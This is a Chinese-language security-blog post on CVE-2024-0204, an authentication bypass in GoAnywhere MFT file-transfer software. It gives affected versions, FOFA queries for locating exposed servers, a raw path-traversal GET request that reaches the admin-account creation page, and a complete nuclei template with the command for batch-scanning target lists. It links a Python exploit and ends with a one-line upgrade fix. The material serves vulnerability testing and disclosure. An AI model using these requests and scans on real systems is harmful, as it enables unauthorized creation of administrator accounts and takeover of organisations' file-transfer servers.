CVE-2024-0204

admin 2024年1月31日10:05:34评论47 views字数 2393阅读7分58秒阅读模式

使

01

漏洞名称

Goanywhere MFT 未授权创建管理员漏洞

02

漏洞影响

影响版本

6.x >= 6.0.1

7.x < 7.4.1

CVE-2024-0204

03

漏洞描述

GoAnywhere MFT是一个安全的文件传输软件解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。旨在通过其集中控制和广泛的安全设置,为组织提供一个高效、安全的文件传输环境。该漏洞存在于GoAnywhere MFT 中,是一个身份认证绕过漏洞。未经身份验证的远程攻击者可利用该漏洞,绕过身份认证,通过管理门户创建管理员用户。

漏洞分析可以参考博客

https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/

04

FOFA搜索语句
body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"

CVE-2024-0204

05

漏洞复现

POC数据包如下

GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1Host: 192.168.40.130:8000User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

如果响应内容中包含关键字

Create an administrator account

则存在漏洞

由于是get请求,直接使用浏览器可以直观看到有个创建用户的界面,可以直接创建管理员用户。

CVE-2024-0204

漏洞复现成功

06

漏洞批量扫描脚本

nuclei poc文件内容如下

id: CVE-2024-0204info:  name: Fortra GoAnywhere MFT - Authentication Bypass  author: DhiyaneshDK  severity: critical  description: |    Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.  reference:    - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml    - https://www.fortra.com/security/advisory/fi-2024-001    - https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py    - https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H    cvss-score: 9.8    cve-id: CVE-2024-0204    cwe-id: CWE-425  metadata:    verified: true    max-request: 1    shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 || html:InvalidBrowser.xhtml  tags: cve,cve2024,auth-bypass,goanywherehttp:  - method: GET    path:      - "{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"    matchers-condition: and    matchers:      - type: word        part: body        words:          - "Create an administrator account"          - "goanywhere"        condition: and      - type: status        status:          - 200# digest: 490a0046304402204cf4124e1cf41e749682dfd2780edee610ad177d8f87b7e5adfaad7e1deaf55602200b1c67b0a6ee6be3e4fc0b8a89ae9672ae6995e4dce26b247f1881f6b4954312:922c64590222798bb761d5b6d8e72950

运行POC

nuclei.exe -l data/GoAnywhere-MFT.txt -t mypoc/cve/CVE-2024-0204.yaml

CVE-2024-0204

github上也有python扫描脚本,喜欢python的可以下载使用

https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py

07

修复建议

升级到最新版本。

08

原文始发于微信公众号(AI与网安):CVE-2024-0204

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月31日10:05:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-0204http://cn-sec.com/archives/2448341.html

发表评论

匿名网友 填写信息